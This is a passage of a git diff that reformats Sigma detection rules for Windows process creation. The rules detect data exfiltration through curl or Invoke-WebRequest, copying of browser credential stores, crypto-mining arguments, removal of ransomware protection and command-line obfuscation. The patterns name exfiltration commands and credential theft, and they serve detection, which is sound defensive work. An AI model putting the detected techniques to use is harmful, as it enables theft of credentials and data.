CommandLine|endswith: WerFault.exe - NewProcessName|endswith: \WerFault.exe + CommandLine|endswith: WerFault.exe + NewProcessName|endswith: \WerFault.exe selection_rundll32: - CommandLine|endswith: rundll32.exe - NewProcessName|endswith: \rundll32.exe + CommandLine|endswith: rundll32.exe + NewProcessName|endswith: \rundll32.exe selection_regsvcs: - CommandLine|endswith: regsvcs.exe - NewProcessName|endswith: \regsvcs.exe + CommandLine|endswith: regsvcs.exe + NewProcessName|endswith: \regsvcs.exe selection_regasm: - CommandLine|endswith: regasm.exe - NewProcessName|endswith: \regasm.exe + CommandLine|endswith: regasm.exe + NewProcessName|endswith: \regasm.exe selection_regsvr32: - CommandLine|endswith: regsvr32.exe - NewProcessName|endswith: \regsvr32.exe + CommandLine|endswith: regsvr32.exe + NewProcessName|endswith: \regsvr32.exe filter_main_edge_update: ParentProcessName|contains|all: - :\Users\ - \AppData\Local\Microsoft\EdgeUpdate\Install\{ filter_optional_chrome_installer: + # As reported in https://github.com/SigmaHQ/sigma/issues/4570 ParentCommandLine|contains: --uninstall --channel=stable - CommandLine|endswith: rundll32.exe + CommandLine|endswith: rundll32.exe ParentProcessName|contains|all: - :\Users\ - \AppData\Local\Google\Chrome\Application\ ParentProcessName|endswith: \Installer\setup.exe - NewProcessName|endswith: \rundll32.exe - condition: process_creation and (1 of selection_* and not 1 of filter_main_* and - not 1 of filter_optional_*) + NewProcessName|endswith: \rundll32.exe + condition: process_creation and (1 of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unlikely level: high diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_child_process_as_system_.yml b/sigma/builtin/process_creation/proc_creation_win_susp_child_process_as_system_.yml index ff1799432..f5a5c7332 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_child_process_as_system_.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_child_process_as_system_.yml @@ -1,15 +1,13 @@ title: Suspicious Child Process Created as System id: 590a5f4c-6c8c-4f10-8307-89afe9453a9d status: test -description: Detection of child processes spawned with SYSTEM privileges by parents - with LOCAL SERVICE or NETWORK SERVICE accounts +description: Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment - https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/ - https://github.com/antonioCoco/RogueWinRM - https://twitter.com/Cyb3rWard0g/status/1453123054243024897 -author: Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research - (OTR) +author: Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR) date: 2019/10/26 modified: 2022/12/15 tags: @@ -30,17 +28,17 @@ detection: ParentUser|endswith: - \NETWORK SERVICE - \LOCAL SERVICE - SubjectUserName|contains: + SubjectUserName|contains: # covers many language settings - AUTHORI - AUTORI - SubjectUserName|endswith: + SubjectUserName|endswith: # System - \SYSTEM - - "\\Syst\xE8me" - - "\\\u0421\u0418\u0421\u0422\u0415\u041C\u0410" + - \Système + - \СИСТЕМА MandatoryLabel: S-1-16-16384 filter_rundll32: - CommandLine|contains: DavSetCookie - NewProcessName|endswith: \rundll32.exe + CommandLine|contains: DavSetCookie + NewProcessName|endswith: \rundll32.exe condition: process_creation and (selection and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_cli_obfuscation_escape_char.yml b/sigma/builtin/process_creation/proc_creation_win_susp_cli_obfuscation_escape_char.yml index 99fa31b7e..8c3c0ea45 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_cli_obfuscation_escape_char.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_cli_obfuscation_escape_char.yml @@ -4,8 +4,8 @@ status: test description: Detects potential commandline obfuscation using known escape characters references: - https://twitter.com/vysecurity/status/885545634958385153 - - https://twitter.com/Hexacorn/status/885553465417756673 - - https://twitter.com/Hexacorn/status/885570278637678592 + - https://twitter.com/Hexacorn/status/885553465417756673 # Dead link + - https://twitter.com/Hexacorn/status/885570278637678592 # Dead link - https://www.mandiant.com/resources/blog/obfuscation-wild-targeted-attackers-lead-way-evasion-techniques - https://web.archive.org/web/20190213114956/http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/ author: juju4 @@ -22,7 +22,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: + # - # no TAB modifier in sigmac yet, so this matches (or TAB in elasticsearch backends without DSL queries) - h^t^t^p - h"t"t"p condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_cli_obfuscation_unicode.yml b/sigma/builtin/process_creation/proc_creation_win_susp_cli_obfuscation_unicode.yml index 9011d4762..5d1481c47 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_cli_obfuscation_unicode.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_cli_obfuscation_unicode.yml @@ -1,16 +1,12 @@ title: Potential Commandline Obfuscation Using Unicode Characters id: e0552b19-5a83-4222-b141-b36184bb8d79 related: - - id: 2c0d2d7b-30d6-4d14-9751-7b9113042ab9 - type: obsoletes + - id: 2c0d2d7b-30d6-4d14-9751-7b9113042ab9 + type: obsoletes status: test -description: 'Detects potential commandline obfuscation using unicode characters. - - Adversaries may attempt to make an executable or file difficult to discover or - analyze by encrypting, encoding, or otherwise obfuscating its contents on the - system or in transit. - - ' +description: | + Detects potential commandline obfuscation using unicode characters. + Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. references: - https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http @@ -28,27 +24,27 @@ detection: EventID: 4688 Channel: Security selection_spacing_modifiers: - CommandLine|contains: - - "\u02E3" - - "\u02EA" - - "\u02E2" - selection_unicode_slashes: - CommandLine|contains: - - "\u2215" - - "\u2044" - selection_unicode_hyphens: - CommandLine|contains: - - "\u2015" - - "\u2014" + CommandLine|contains: # spacing modifier letters that get auto-replaced + - ˣ # 0x02E3 + - ˪ # 0x02EA + - ˢ # 0x02E2 + selection_unicode_slashes: # forward slash alternatives + CommandLine|contains: + - ∕ # 0x22FF + - ⁄ # 0x206F + selection_unicode_hyphens: # hyphen alternatives + CommandLine|contains: + - ― # 0x2015 + - — # 0x2014 selection_other: - CommandLine|contains: - - "\xE2" - - "\u20AC" - - "\xA3" - - "\xAF" - - "\xAE" - - "\xB5" - - "\xB6" + CommandLine|contains: + - â + - € + - £ + - ¯ + - ® + - µ + - ¶ condition: process_creation and (1 of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_commandline_path_traversal_evasion.yml b/sigma/builtin/process_creation/proc_creation_win_susp_commandline_path_traversal_evasion.yml index dab221095..09c4b1242 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_commandline_path_traversal_evasion.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_commandline_path_traversal_evasion.yml @@ -1,8 +1,7 @@ title: Potential Command Line Path Traversal Evasion Attempt id: 1327381e-6ab0-4f38-b583-4c1b8346a56b status: experimental -description: Detects potential evasion or obfuscation attempts using bogus path traversal - via the commandline +description: Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline references: - https://twitter.com/hexacorn/status/1448037865435320323 - https://twitter.com/Gal_B1t/status/1062971006078345217 @@ -20,17 +19,17 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains: + CommandLine|contains: - \..\Windows\ - \..\System32\ - \..\..\ - NewProcessName|contains: \Windows\ + NewProcessName|contains: \Windows\ selection_2: - CommandLine|contains: .exe\..\ + CommandLine|contains: .exe\..\ filter_optional_google_drive: - CommandLine|contains: \Google\Drive\googledrivesync.exe\..\ + CommandLine|contains: \Google\Drive\googledrivesync.exe\..\ filter_optional_citrix: - CommandLine|contains: \Citrix\Virtual Smart Card\Citrix.Authentication.VirtualSmartcard.Launcher.exe\..\ + CommandLine|contains: \Citrix\Virtual Smart Card\Citrix.Authentication.VirtualSmartcard.Launcher.exe\..\ condition: process_creation and (1 of selection_* and not 1 of filter_optional_*) falsepositives: - Google Drive diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_copy_browser_data.yml b/sigma/builtin/process_creation/proc_creation_win_susp_copy_browser_data.yml index 5645ab410..7731061e5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_copy_browser_data.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_copy_browser_data.yml @@ -1,19 +1,13 @@ title: Potential Browser Data Stealing id: 47147b5b-9e17-4d76-b8d2-7bac24c5ce1b related: - - id: fc028194-969d-4122-8abe-0470d5b8f12f - type: derived + - id: fc028194-969d-4122-8abe-0470d5b8f12f + type: derived status: experimental -description: 'Adversaries may acquire credentials from web browsers by reading files - specific to the target browser. - - Web browsers commonly save credentials such as website usernames and passwords - so that they do not need to be entered manually in the future. - - Web browsers typically store the credentials in an encrypted format within a credential - store. - - ' +description: | + Adversaries may acquire credentials from web browsers by reading files specific to the target browser. + Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. + Web browsers typically store the credentials in an encrypted format within a credential store. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md author: Nasreddine Bencherchali (Nextron Systems) @@ -30,23 +24,23 @@ detection: EventID: 4688 Channel: Security selection_cmd: - - CommandLine|contains: - - copy-item - - 'copy ' - - 'cpi ' - - ' cp ' - - 'move ' - - move-item - - ' mi ' - - ' mv ' - - NewProcessName|endswith: - - \xcopy.exe - - \robocopy.exe - - OriginalFileName: - - XCOPY.EXE - - robocopy.exe + - CommandLine|contains: + - copy-item + - 'copy ' + - 'cpi ' + - ' cp ' + - 'move ' + - move-item + - ' mi ' + - ' mv ' + - NewProcessName|endswith: + - \xcopy.exe + - \robocopy.exe + - OriginalFileName: + - XCOPY.EXE + - robocopy.exe selection_path: - CommandLine|contains: + CommandLine|contains: - \Amigo\User Data - \BraveSoftware\Brave-Browser\User Data - \CentBrowser\User Data diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_copy_lateral_movement.yml b/sigma/builtin/process_creation/proc_creation_win_susp_copy_lateral_movement.yml index f39c5deb1..107d2f632 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_copy_lateral_movement.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_copy_lateral_movement.yml @@ -1,15 +1,13 @@ title: Copy From Or To Admin Share Or Sysvol Folder id: 855bc8b5-2ae8-402e-a9ed-b889e6df1900 status: test -description: Detects a copy command or a copy utility execution to or from an Admin - share or remote +description: Detects a copy command or a copy utility execution to or from an Admin share or remote references: - https://twitter.com/SBousseaden/status/1211636381086339073 - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view - https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/ -author: Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, - Zach Stanford @svch0st, Nasreddine Bencherchali +author: Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali date: 2019/12/30 modified: 2023/11/15 tags: @@ -27,30 +25,30 @@ detection: EventID: 4688 Channel: Security selection_target: - CommandLine|contains: + CommandLine|contains: - \\\\*$ - \Sysvol\ selection_other_tools: - - NewProcessName|endswith: - - \robocopy.exe - - \xcopy.exe - - OriginalFileName: - - robocopy.exe - - XCOPY.EXE + - NewProcessName|endswith: + - \robocopy.exe + - \xcopy.exe + - OriginalFileName: + - robocopy.exe + - XCOPY.EXE selection_cmd_img: - - NewProcessName|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cmd_cli: - CommandLine|contains: copy + CommandLine|contains: copy selection_pwsh_img: - - NewProcessName|contains: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|contains: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_pwsh_cli: - CommandLine|contains: + CommandLine|contains: - copy-item - 'copy ' - 'cpi ' @@ -59,8 +57,7 @@ detection: - move-item - ' mi ' - ' mv ' - condition: process_creation and (selection_target and (selection_other_tools or - all of selection_cmd_* or all of selection_pwsh_*)) + condition: process_creation and (selection_target and (selection_other_tools or all of selection_cmd_* or all of selection_pwsh_*)) falsepositives: - Administrative scripts level: medium diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_copy_system_dir.yml b/sigma/builtin/process_creation/proc_creation_win_susp_copy_system_dir.yml index a09426e26..c9610dd27 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_copy_system_dir.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_copy_system_dir.yml @@ -1,23 +1,17 @@ title: Suspicious Copy From or To System Directory id: fff9d2b7-e11c-4a69-93d3-40ef66189767 related: - - id: 855bc8b5-2ae8-402e-a9ed-b889e6df1900 - type: derived + - id: 855bc8b5-2ae8-402e-a9ed-b889e6df1900 + type: derived status: test -description: 'Detects a suspicious copy operation that tries to copy a program from - system (System32, SysWOW64, WinSxS) directories to another on disk. - - Often used to move LOLBINs such as ''certutil'' or ''desktopimgdownldr'' to a - different location with a different name in order to bypass detections based on - locations. - - ' +description: | + Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk. + Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations. references: - https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120 - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html - https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/ -author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine - Bencherchali (Nextron Systems) +author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems) date: 2020/07/03 modified: 2023/08/29 tags: @@ -31,34 +25,33 @@ detection: EventID: 4688 Channel: Security selection_cmd: - CommandLine|contains: 'copy ' - NewProcessName|endswith: \cmd.exe + CommandLine|contains: 'copy ' + NewProcessName|endswith: \cmd.exe selection_pwsh: - CommandLine|contains: + CommandLine|contains: - copy-item - ' copy ' - 'cpi ' - ' cp ' - NewProcessName|endswith: + NewProcessName|endswith: - \powershell.exe - \pwsh.exe selection_other: - - NewProcessName|endswith: - - \robocopy.exe - - \xcopy.exe - - OriginalFileName: - - robocopy.exe - - XCOPY.EXE + - NewProcessName|endswith: + - \robocopy.exe + - \xcopy.exe + - OriginalFileName: + - robocopy.exe + - XCOPY.EXE target: - CommandLine|contains: + CommandLine|contains: - \System32 - \SysWOW64 - \WinSxS condition: process_creation and (1 of selection_* and target) falsepositives: - - Depend on scripts and administrative tools used in the monitored environment - (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/) - - When cmd.exe and xcopy.exe are called directly + - Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/) + - When cmd.exe and xcopy.exe are called directly # C:\Windows\System32\cmd.exe /c copy file1 file2 - When the command contains the keywords but not in the correct order level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml b/sigma/builtin/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml index b1744a7ad..8e287bd63 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml @@ -1,14 +1,11 @@ title: LOL-Binary Copied From System Directory id: f5d19838-41b5-476c-98d8-ba8af4929ee2 related: - - id: fff9d2b7-e11c-4a69-93d3-40ef66189767 - type: derived + - id: fff9d2b7-e11c-4a69-93d3-40ef66189767 + type: derived status: experimental -description: 'Detects a suspicious copy operation that tries to copy a known LOLBIN - from system (System32, SysWOW64, WinSxS) directories to another on disk in order - to bypass detections based on locations. - - ' +description: | + Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations. references: - https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120 - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html @@ -26,31 +23,32 @@ detection: EventID: 4688 Channel: Security selection_tools_cmd: - CommandLine|contains: 'copy ' - NewProcessName|endswith: \cmd.exe + CommandLine|contains: 'copy ' + NewProcessName|endswith: \cmd.exe selection_tools_pwsh: - CommandLine|contains: + CommandLine|contains: - copy-item - ' copy ' - 'cpi ' - ' cp ' - NewProcessName|endswith: + NewProcessName|endswith: - \powershell.exe - \pwsh.exe selection_tools_other: - - NewProcessName|endswith: - - \robocopy.exe - - \xcopy.exe - - OriginalFileName: - - robocopy.exe - - XCOPY.EXE + - NewProcessName|endswith: + - \robocopy.exe + - \xcopy.exe + - OriginalFileName: + - robocopy.exe + - XCOPY.EXE selection_target_path: - CommandLine|contains: + CommandLine|contains: - \System32 - \SysWOW64 - \WinSxS selection_target_lolbin: - CommandLine|contains: + CommandLine|contains: + # Note: add more binaries to increase coverage - \bitsadmin.exe - \calc.exe - \certutil.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_crypto_mining_monero.yml b/sigma/builtin/process_creation/proc_creation_win_susp_crypto_mining_monero.yml index 738a5aaf5..774b39a5d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_crypto_mining_monero.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_crypto_mining_monero.yml @@ -18,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - ' --cpu-priority=' - --donate-level=0 - ' -o pool.' @@ -26,9 +26,11 @@ detection: - ' --algo=rx/0 ' - stratum+tcp:// - stratum+udp:// + # base64 encoded: --donate-level= - LS1kb25hdGUtbGV2ZWw9 - 0tZG9uYXRlLWxldmVsP - tLWRvbmF0ZS1sZXZlbD + # base64 encoded: stratum+tcp:// and stratum+udp:// - c3RyYXR1bSt0Y3A6Ly - N0cmF0dW0rdGNwOi8v - zdHJhdHVtK3RjcDovL @@ -36,7 +38,7 @@ detection: - N0cmF0dW0rdWRwOi8v - zdHJhdHVtK3VkcDovL filter: - CommandLine|contains: + CommandLine|contains: - ' pool.c ' - ' pool.o ' - gcc - diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml b/sigma/builtin/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml index 5d6a0e730..74e7e34ce 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml @@ -18,54 +18,53 @@ detection: EventID: 4688 Channel: Security selection_iwr: - CommandLine|contains: + CommandLine|contains: - Invoke-WebRequest - 'iwr ' - 'wget ' - 'curl ' - CommandLine|contains|all: - - ' -ur' - - ' -me' + CommandLine|contains|all: + - ' -ur' # Shortest possible version of the -uri flag + - ' -me' # Shortest possible version of the -method flag - ' -b' - ' POST ' - NewProcessName|endswith: + NewProcessName|endswith: - \powershell.exe - \pwsh.exe - \cmd.exe selection_curl: - CommandLine|contains: --ur - NewProcessName|endswith: \curl.exe + CommandLine|contains: --ur # Shortest possible version of the --uri flag + NewProcessName|endswith: \curl.exe selection_curl_data: - CommandLine|contains: - - ' -d ' + CommandLine|contains: + - ' -d ' # Shortest possible version of the --data flag - ' --data ' selection_wget: - CommandLine|contains: + CommandLine|contains: - --post-data - --post-file - NewProcessName|endswith: \wget.exe + NewProcessName|endswith: \wget.exe payloads: - - CommandLine|contains: - - Get-Content - - GetBytes - - hostname - - ifconfig - - ipconfig - - net view - - netstat - - nltest - - qprocess - - sc query - - systeminfo - - tasklist - - ToBase64String - - whoami - - CommandLine|contains|all: - - 'type ' - - ' > ' - - ' C:\' - condition: process_creation and ((selection_iwr or all of selection_curl* or selection_wget) - and payloads) + - CommandLine|contains: + - Get-Content + - GetBytes + - hostname + - ifconfig + - ipconfig + - net view + - netstat + - nltest + - qprocess + - sc query + - systeminfo + - tasklist + - ToBase64String + - whoami + - CommandLine|contains|all: + - 'type ' + - ' > ' + - ' C:\' + condition: process_creation and ((selection_iwr or all of selection_curl* or selection_wget) and payloads) falsepositives: - Unlikely level: high diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_disable_raccine.yml b/sigma/builtin/process_creation/proc_creation_win_susp_disable_raccine.yml index a2d5bb44f..cb1aee3ed 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_disable_raccine.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_disable_raccine.yml @@ -1,8 +1,7 @@ title: Raccine Uninstall id: a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc status: test -description: Detects commands that indicate a Raccine removal from an end system. - Raccine is a free ransomware protection tool. +description: Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool. references: - https://github.com/Neo23x0/Raccine author: Florian Roth (Nextron Systems) @@ -19,16 +18,16 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|contains|all: + CommandLine|contains|all: - 'taskkill ' - RaccineSettings.exe selection2: - CommandLine|contains|all: + CommandLine|contains|all: - reg.exe - delete - Raccine Tray selection3: - CommandLine|contains|all: + CommandLine|contains|all: - schtasks - /DELETE - Raccine Rules Updater diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_double_extension.yml b/sigma/builtin/process_creation/proc_creation_win_susp_double_extension.yml index 3d6725091..a4838db0e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_double_extension.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_double_extension.yml @@ -1,17 +1,14 @@ title: Suspicious Double Extension File Execution id: 1cdd9a09-06c9-4769-99ff-626e2b3991b8 related: - - id: 5e6a80c8-2d45-4633-9ef4-fa2671a39c5c - type: similar + - id: 5e6a80c8-2d45-4633-9ef4-fa2671a39c5c # ParentImage/ParentCommandLine + type: similar status: stable -description: Detects suspicious use of an .exe extension after a non-executable file - extension like .pdf.exe, a set of spaces or underlines to cloak the executable - file in spear phishing campaigns +description: Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns references: - https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html - https://twitter.com/blackorbird/status/1140519090961825792 -author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali - (Nextron Systems) +author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems) date: 2019/06/26 modified: 2023/02/28 tags: @@ -25,7 +22,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - .doc.exe - .docx.exe - .xls.exe @@ -46,7 +43,7 @@ detection: - .rtf.js - .pdf.js - .txt.js - NewProcessName|endswith: + NewProcessName|endswith: - .doc.exe - .docx.exe - .xls.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_double_extension_parent.yml b/sigma/builtin/process_creation/proc_creation_win_susp_double_extension_parent.yml index 0c2a34a01..32b78b87c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_double_extension_parent.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_double_extension_parent.yml @@ -1,8 +1,8 @@ title: Suspicious Parent Double Extension File Execution id: 5e6a80c8-2d45-4633-9ef4-fa2671a39c5c related: - - id: 1cdd9a09-06c9-4769-99ff-626e2b3991b8 - type: derived + - id: 1cdd9a09-06c9-4769-99ff-626e2b3991b8 # Image/CommandLine + type: derived status: test description: Detect execution of suspicious double extension files in ParentCommandLine references: @@ -22,44 +22,44 @@ detection: EventID: 4688 Channel: Security selection: - - ParentProcessName|endswith: - - .doc.lnk - - .docx.lnk - - .xls.lnk - - .xlsx.lnk - - .ppt.lnk - - .pptx.lnk - - .rtf.lnk - - .pdf.lnk - - .txt.lnk - - .doc.js - - .docx.js - - .xls.js - - .xlsx.js - - .ppt.js - - .pptx.js - - .rtf.js - - .pdf.js - - .txt.js - - ParentCommandLine|contains: - - .doc.lnk - - .docx.lnk - - .xls.lnk - - .xlsx.lnk - - .ppt.lnk - - .pptx.lnk - - .rtf.lnk - - .pdf.lnk - - .txt.lnk - - .doc.js - - .docx.js - - .xls.js - - .xlsx.js - - .ppt.js - - .pptx.js - - .rtf.js - - .pdf.js - - .txt.js + - ParentProcessName|endswith: + - .doc.lnk + - .docx.lnk + - .xls.lnk + - .xlsx.lnk + - .ppt.lnk + - .pptx.lnk + - .rtf.lnk + - .pdf.lnk + - .txt.lnk + - .doc.js + - .docx.js + - .xls.js + - .xlsx.js + - .ppt.js + - .pptx.js + - .rtf.js + - .pdf.js + - .txt.js + - ParentCommandLine|contains: + - .doc.lnk + - .docx.lnk + - .xls.lnk + - .xlsx.lnk + - .ppt.lnk + - .pptx.lnk + - .rtf.lnk + - .pdf.lnk + - .txt.lnk + - .doc.js + - .docx.js + - .xls.js + - .xlsx.js + - .ppt.js + - .pptx.js + - .rtf.js + - .pdf.js + - .txt.js condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_download_office_domain.yml b/sigma/builtin/process_creation/proc_creation_win_susp_download_office_domain.yml index c5628a692..0eff7e829 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_download_office_domain.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_download_office_domain.yml @@ -1,8 +1,7 @@ title: Suspicious Download from Office Domain id: 00d49ed5-4491-4271-a8db-650a4ef6f8c1 status: test -description: Detects suspicious ways to download files from Microsoft domains that - are used to store attachments in Emails or OneNote documents +description: Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents references: - https://twitter.com/an0n_r0/status/1474698356635193346?s=12 - https://twitter.com/mrd0x/status/1475085452784844803?s=12 @@ -21,24 +20,23 @@ detection: EventID: 4688 Channel: Security selection_download: - - NewProcessName|endswith: - - \curl.exe - - \wget.exe - - CommandLine|contains: - - Invoke-WebRequest - - 'iwr ' - - 'curl ' - - 'wget ' - - Start-BitsTransfer - - .DownloadFile( - - .DownloadString( + - NewProcessName|endswith: + - \curl.exe + - \wget.exe + - CommandLine|contains: + - Invoke-WebRequest + - 'iwr ' + - 'curl ' + - 'wget ' + - Start-BitsTransfer + - .DownloadFile( + - .DownloadString( selection_domains: - CommandLine|contains: + CommandLine|contains: - https://attachment.outlook.live.net/owa/ - https://onenoteonlinesync.onenote.com/onenoteonlinesync/ condition: process_creation and (all of selection_*) falsepositives: - - Scripts or tools that download attachments from these domains (OneNote, Outlook - 365) + - Scripts or tools that download attachments from these domains (OneNote, Outlook 365) level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_dumpstack_log_evasion.yml b/sigma/builtin/process_creation/proc_creation_win_susp_dumpstack_log_evasion.yml index 607c1d5ef..dfbfad02d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_dumpstack_log_evasion.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_dumpstack_log_evasion.yml @@ -17,9 +17,9 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \DumpStack.log + NewProcessName|endswith: \DumpStack.log selection_download: - CommandLine|contains: ' -o DumpStack.log' + CommandLine|contains: ' -o DumpStack.log' condition: process_creation and (1 of selection*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_elavated_msi_spawned_shell.yml b/sigma/builtin/process_creation/proc_creation_win_susp_elavated_msi_spawned_shell.yml index 3b6923d16..6af907243 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_elavated_msi_spawned_shell.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_elavated_msi_spawned_shell.yml @@ -18,14 +18,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \cmd.exe - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - Cmd.Exe - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \cmd.exe + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - Cmd.Exe + - PowerShell.EXE + - pwsh.dll selection_parent: ParentProcessName|contains|all: - \Windows\Installer\ diff --git a/sigma/builtin/process_creation/proc_creation_win_susp_electron_app_children.yml b/sigma/builtin/process_creation/proc_creation_win_susp_electron_app_children.yml index 7126f6fcd..1268a9c52 100644 --- a/sigma/builtin/process_creation/proc_creation_win_susp_electron_app_children.yml +++ b/sigma/builtin/process_creation/proc_creation_win_susp_electron_app_children.yml @@ -1,15 +1,11 @@ title: Suspicious Electron Application Child Processes id: f26eb764-fd89-464b-85e2-dc4a8e6e77b8 related: - - id: 